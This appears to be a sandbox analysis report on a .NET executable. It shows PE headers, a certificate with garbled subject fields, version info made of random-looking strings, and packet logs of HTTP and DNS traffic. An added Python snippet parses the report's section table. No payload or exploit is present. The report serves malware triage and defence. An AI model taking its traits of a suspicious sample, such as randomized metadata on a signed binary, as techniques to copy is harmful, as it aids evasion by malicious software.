                                                    • C=????????????????????????????????????????, S=&#225;&#175;&#138;&#225;&#175;&#153;&#225;&#175;&#167;&#225;&#175;&#179;&#225;&#175;&#142;&#225;&#175;&#140;&#225;&#175;&#147;&#225;&#175;&#150;&#225;&#175;&#167;&#225;&#175;&#166;&#225;&#175;&#165;&#225;&#175;&#134;&#225;&#175;&#144;&#225;&#175;&#137;&#225;&#175;&#144;&#225;&#175;&#163;&#225;&#175;&#141;&#225;&#175;&#134;&#225;&#175;&#169;&#225;&#175;&#132;&#225;&#175;&#175;&#225;&#175;&#183;&#225;&#175;&#162;&#225;&#175;&#150;&#225;&#175;&#146;&#225;&#175;&#139;&#225;&#175;&#145;&#225;&#175;&#146;&#225;&#175;&#176;&#225;&#175;&#187;&#225;&#175;&#142;&#225;&#175;&#138;&#225;&#175;&#187;&#225;&#175;&#132;&#225;&#175;&#131;&#225;&#175;&#179;&#225;&#175;&#131;&#225;&#175;&#173;&#225;&#175;&#150;&#225;&#175;&#166;&#225;&#175;&#183;&#225;&#175;&#151;&#225;&#175;&#183;&#225;&#175;&#139;&#225;&#175;&#137;&#225;&#175;&#138;&#225;&#175;&#140;, L=&#233;&#158;&#134;&#233;&#158;&#147;&#233;&#158;&#146;&#233;&#158;&#177;&#233;&#158;&#189;&#233;&#158;&#184;&#233;&#158;&#154;&#233;&#158;&#148;&#233;&#158;&#155;&#233;&#158;&#172;&#233;&#158;&#145;&#233;&#158;&#166;, T=&#237;&#133;&#174;&#237;&#133;&#132;&#237;&#133;&#140;&#237;&#133;&#133;&#237;&#133;&#129;&#237;&#133;&#137;&#237;&#133;&#176;&#237;&#133;&#143;&#237;&#133;&#142;&#237;&#132;&#191;&#237;&#133;&#148;&#237;&#132;&#189;&#237;&#133;&#147;&#237;&#133;&#181;&#237;&#133;&#161;&#237;&#133;&#146;&#237;&#133;&#142;&#237;&#133;&#161;&#237;&#133;&#133;&#237;&#133;&#171;&#237;&#133;&#168;&#237;&#133;&#146;&#237;&#133;&#140;&#237;&#133;&#160;&#237;&#133;&#146;&#237;&#133;&#139;&#237;&#133;&#132;&#237;&#133;&#158;&#237;&#133;&#163;&#237;&#133;&#164;&#237;&#133;&#136;&#237;&#133;&#159;&#237;&#133;&#178;&#237;&#133;&#143;&#237;&#133;&#177;&#237;&#133;&#182;&#237;&#133;&#163;&#237;&#133;&#166;&#237;&#133;&#172;&#237;&#133;&#131;&#237;&#132;&#191;&#237;&#133;&#131;&#237;&#133;&#139;&#237;&#133;&#169;, E=???????????, OU=&#231;&#177;&#152;&#231;&#177;&#184;&#231;&#177;&#180;&#231;&#177;&#189;&#231;&#177;&#157;&#231;&#177;&#149;&#231;&#177;&#151;&#231;&#177;&#164;&#231;&#177;&#169;&#231;&#178;&#139;&#231;&#177;&#164;&#231;&#178;&#132;&#231;&#178;&#140;&#231;&#178;&#132;&#231;&#177;&#156;&#231;&#178;&#140;&#231;&#177;&#152;&#231;&#177;&#189;&#231;&#177;&#181;&#231;&#178;&#130;&#231;&#177;&#162;&#231;&#177;&#160;&#231;&#177;&#180;&#231;&#178;&#134;&#231;&#177;&#168;, O=&#235;&#158;&#169;&#235;&#158;&#189;&#235;&#158;&#185;&#235;&#158;&#166;&#235;&#158;&#175;&#235;&#158;&#185;&#235;&#158;&#133;&#235;&#158;&#176;&#235;&#158;&#137;&#235;&#158;&#143;&#235;&#158;&#183;&#235;&#158;&#174;&#235;&#158;&#177;&#235;&#158;&#187;&#235;&#158;&#171;&#235;&#158;&#133;&#235;&#158;&#184;, CN=&#236;&#176;&#159;&#236;&#176;&#168;&#236;&#176;&#179;&#236;&#176;&#180;&#236;&#176;&#145;&#236;&#176;&#183;&#236;&#176;&#182;&#236;&#176;&#180;&#236;&#176;&#159;&#236;&#176;&#142;&#236;&#176;&#153;&#236;&#176;&#151;&#236;&#176;&#169;&#236;&#176;&#178;&#236;&#176;&#175;&#236;&#176;&#153;&#236;&#176;&#147;&#236;&#176;&#145;&#236;&#176;&#172;
                                                    Version:3
                                                    Thumbprint MD5:9F981C1542F258BA57F760B8F42201BA
                                                    Thumbprint SHA-1:9B44DB25DEE3DB49C3571B6A649C69CF2B48307D
                                                    Thumbprint SHA-256:7F1CD5F2C754597D3ED7F82B0146688256270022763BF32FA684505C11EF7A2A
                                                    Serial:00C1276E79B4388663776A454F741801A5

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    Name                                  Virtual Address  Virtual Size  Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT          0x4e3c           0x4f          .text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE        0x6000           0x3e0         .rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY        0x3800           0x1888
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC       0x8000           0xc           .reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                    Sections

                                                    Name   | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type         | Entropy         | Characteristics
                                                    .text  | 0x2000          | 0x2e94       | 0x3000   | False    | 0.579345703125  | PPMN archive data | 6.39301885442   | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                    .rsrc  | 0x6000          | 0x3e0        | 0x400    | False    | 0.4638671875    | data              | 3.55157726961   | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc | 0x8000          | 0xc          | 0x200    | False    | 0.044921875     | data              | 0.0815394123432 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    Name       | RVA    | Size  | Type | Language | Country
                                                    RT_VERSION | 0x6058 | 0x388 | data | English  | United States

                                                    Imports

                                                    DLL         | Import
                                                    mscoree.dll | _CorExeMain
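The three tables above (data directories, sections, imports) carry the facts a triager reads off first: the IMPORT, IAT and COM_DESCRIPTOR entries all fall inside .text, the COM_DESCRIPTOR entry (the CLR header) together with the single import of mscoree!_CorExeMain marks this as a managed .NET executable, and the SECURITY entry has no "Is in Section" value because its VirtualAddress field is a raw file offset to the attribute certificate table rather than an RVA. The following Python is an added example, not part of the Joe Sandbox report or its tooling; it rebuilds the "Is in Section" column from the section table, applies those two checks, and includes the Shannon entropy measure behind the Entropy column. The section and directory values are copied from the tables above; the PE rules used are standard PE/COFF behaviour.

```python
"""Added example (not part of the Joe Sandbox report): rebuild the
"Is in Section" column of the Data Directories table from the Sections
table, and derive the two header facts a triager wants from this sample.

Section and directory values are copied from the report; the PE/COFF
rules (RVA containment, SECURITY being a file offset, a non-empty
COM_DESCRIPTOR entry meaning a CLR header exists) are standard."""
import math
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Section:
    name: str
    virtual_address: int
    virtual_size: int
    raw_size: int


# Section table from the report above.
SECTIONS = [
    Section(".text",  0x2000, 0x2e94, 0x3000),
    Section(".rsrc",  0x6000, 0x3e0,  0x400),
    Section(".reloc", 0x8000, 0xc,    0x200),
]

# Non-empty data directory entries from the report: name -> (VirtualAddress, Size).
DATA_DIRECTORIES = {
    "IMPORT":         (0x4e3c, 0x4f),
    "RESOURCE":       (0x6000, 0x3e0),
    "SECURITY":       (0x3800, 0x1888),
    "BASERELOC":      (0x8000, 0xc),
    "IAT":            (0x2000, 0x8),
    "COM_DESCRIPTOR": (0x2008, 0x48),
}

# Imports from the report: (dll, symbol).
IMPORTS = (("mscoree.dll", "_CorExeMain"),)

# Directories whose VirtualAddress field is NOT an RVA. SECURITY holds a
# raw file offset to the attribute certificate table, so it never maps
# to a section; this is why the report leaves that cell blank.
FILE_OFFSET_DIRECTORIES = {"SECURITY"}


def section_for_rva(rva: int, sections=SECTIONS) -> Optional[str]:
    """Return the name of the section whose mapped range contains `rva`.
    The loader maps max(VirtualSize, RawSize) bytes of each section, so
    using the larger value avoids a false 'not in any section' for data
    that sits in the slack past VirtualSize."""
    for s in sections:
        span = max(s.virtual_size, s.raw_size)
        if s.virtual_address <= rva < s.virtual_address + span:
            return s.name
    return None


def directory_sections(dirs=DATA_DIRECTORIES) -> dict:
    """Rebuild the 'Is in Section' column. Empty entries and file-offset
    entries map to None, matching the blank cells in the report."""
    result = {}
    for name, (va, size) in dirs.items():
        if size == 0 or name in FILE_OFFSET_DIRECTORIES:
            result[name] = None
        else:
            result[name] = section_for_rva(va)
    return result


def is_dotnet(dirs=DATA_DIRECTORIES, imports=IMPORTS) -> bool:
    """A managed (.NET Framework) executable has a CLR header, i.e. a
    non-empty COM_DESCRIPTOR entry, and a single import of
    mscoree!_CorExeMain that the native stub jumps to."""
    _, size = dirs.get("COM_DESCRIPTOR", (0, 0))
    return size != 0 and ("mscoree.dll", "_CorExeMain") in imports


def has_certificate_table(dirs=DATA_DIRECTORIES) -> bool:
    """Non-empty SECURITY entry: an attribute certificate table is attached.
    Presence says nothing about validity; verify the signature separately."""
    _, size = dirs.get("SECURITY", (0, 0))
    return size != 0


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, the measure behind the report's Entropy column:
    0.0 for a constant buffer, 8.0 for a uniformly distributed one."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


if __name__ == "__main__":
    for name, sec in directory_sections().items():
        print(f"{name:15s} -> {sec}")
    print("managed (.NET) executable:", is_dotnet())
    print("certificate table attached:", has_certificate_table())
```

Note that `has_certificate_table` only reports that 0x1888 bytes of certificate data are appended at file offset 0x3800; whether that blob is a valid, chained Authenticode signature is a separate check that this report does not make.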

                                                    Version Infos

                                                    Description      | Data
                                                    LegalCopyright   | Copyright 2022 MMluWNXR. All rights reserved.
                                                    Assembly Version | 8.3.0.1
                                                    InternalName     | IGtzbNIQ.exe
                                                    FileVersion      | 8.3.2.1
                                                    CompanyName      | JKJPfHWc
                                                    LegalTrademarks  | XFJPuaSO
                                                    Comments         | PAljSTEY
                                                    ProductName      | IGtzbNIQ
                                                    ProductVersion   | 8.3.0.1
                                                    FileDescription  | JDbwXxui
                                                    OriginalFilename | IGtzbNIQ.exe
                                                    Translation      | 0x0409 0x0514

                                                    Possible Origin

                                                    Language of compilation system | Country where language is spoken | Map
                                                    English                        | United States                    |

                                                    Network Behavior

                                                    Network Port Distribution

                                                    TCP Packets

                                                    Timestamp                           | Source Port | Dest Port | Source IP     | Dest IP
                                                    Feb 23, 2021 09:46:49.547159910 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.600218058 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.600352049 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.601401091 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.654299974 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.687654018 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.687699080 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.687726974 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.687747002 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.687817097 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.688225985 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.688261032 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.688283920 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.688308954 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.688333988 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.688355923 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.688360929 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.688412905 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.689474106 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.689511061 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.689579010 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.690706968 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.690741062 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.690807104 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.691931963 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.691966057 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.692207098 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.693195105 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.693232059 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.693456888 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.694432974 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.694464922 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.694533110 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.695667028 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.695698977 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.696310043 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.696885109 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.696917057 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.696983099 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.698121071 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.698153973 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.698218107 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.699824095 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.699856043 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.699943066 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.700620890 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.700655937 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.700696945 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.740746975 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.740792036 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.740860939 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.741241932 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.741271973 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.741323948 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.742525101 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.742561102 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.742611885 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.743724108 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.743783951 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.743841887 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.744987011 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.745585918 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.745621920 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.745641947 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.746828079 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.746870995 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.746906996 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.748076916 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.748135090 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.748147964 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.749310970 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.749347925 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.749372005 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.750562906 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.750601053 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.750631094 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.751826048 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.751856089 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.751888990 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.753025055 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.753053904 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.753082991 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.754278898 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.754313946 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.754328012 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.755542994 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.755600929 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.755606890 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.756756067 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.756793022 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.756820917 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.758002996 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.758039951 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.758071899 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.759249926 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.759315968 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.759833097 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.759865046 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.759911060 CET | 49734       | 80        | 192.168.2.4   | 104.21.71.230
                                                    Feb 23, 2021 09:46:49.761127949 CET | 80          | 49734     | 104.21.71.230 | 192.168.2.4

                                                    UDP Packets

                                                    Timestamp                           | Source Port | Dest Port | Source IP   | Dest IP
                                                    Feb 23, 2021 09:46:42.001240969 CET | 54531       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:46:42.052741051 CET | 53          | 54531     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:46:42.979888916 CET | 49714       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:46:43.045166016 CET | 53          | 49714     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:46:43.292514086 CET | 58028       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:46:43.350888014 CET | 53          | 58028     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:46:43.969582081 CET | 53097       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:46:44.021044970 CET | 53          | 53097     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:46:45.230526924 CET | 49257       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:46:45.279738903 CET | 53          | 49257     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:46:46.422629118 CET | 62389       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:46:46.474086046 CET | 53          | 62389     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:46:47.701091051 CET | 49910       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:46:47.749731064 CET | 53          | 49910     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:46:48.638009071 CET | 55854       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:46:48.690993071 CET | 53          | 55854     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.462008953 CET | 64549       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:46:49.524245024 CET | 53          | 64549     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:46:49.879054070 CET | 63153       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:46:49.927489996 CET | 53          | 63153     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:46:51.107851028 CET | 52991       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:46:51.158024073 CET | 53          | 52991     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:46:52.032669067 CET | 53700       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:46:52.084407091 CET | 53          | 53700     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:46:53.216989040 CET | 51726       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:46:53.268445969 CET | 53          | 51726     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:46:54.436453104 CET | 56794       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:46:54.485238075 CET | 53          | 56794     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:46:55.478406906 CET | 56534       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:46:55.528536081 CET | 53          | 56534     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:46:56.664275885 CET | 56627       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:46:56.716010094 CET | 53          | 56627     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:46:57.948623896 CET | 56621       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:46:57.998764992 CET | 53          | 56621     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:46:59.326009989 CET | 63116       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:46:59.374589920 CET | 53          | 63116     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:47:00.498929977 CET | 64078       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:47:00.550529957 CET | 53          | 64078     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:47:01.702426910 CET | 64801       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:47:01.753803015 CET | 53          | 64801     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:47:03.529426098 CET | 61721       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:47:03.578073978 CET | 53          | 61721     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:47:10.883807898 CET | 51255       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:47:10.935354948 CET | 53          | 51255     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:47:11.641897917 CET | 61522       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:47:11.693872929 CET | 53          | 61522     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:47:32.954160929 CET | 52337       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:47:33.021403074 CET | 53          | 52337     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:47:33.692751884 CET | 55046       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:47:33.755928040 CET | 53          | 55046     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:47:34.363035917 CET | 49612       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:47:34.422765970 CET | 53          | 49612     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:47:34.481651068 CET | 49285       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:47:34.543003082 CET | 53          | 49285     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:47:34.698141098 CET | 50601       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:47:34.763484001 CET | 53          | 50601     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:47:34.870208979 CET | 60875       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:47:34.931930065 CET | 53          | 60875     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:47:35.428864956 CET | 56448       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:47:35.485877991 CET | 53          | 56448     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:47:35.591675997 CET | 59172       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:47:35.640197039 CET | 53          | 59172     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:47:36.052752018 CET | 62420       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:47:36.109827042 CET | 53          | 62420     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:47:36.981036901 CET | 60579       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:47:37.038213968 CET | 53          | 60579     | 8.8.8.8     | 192.168.2.4
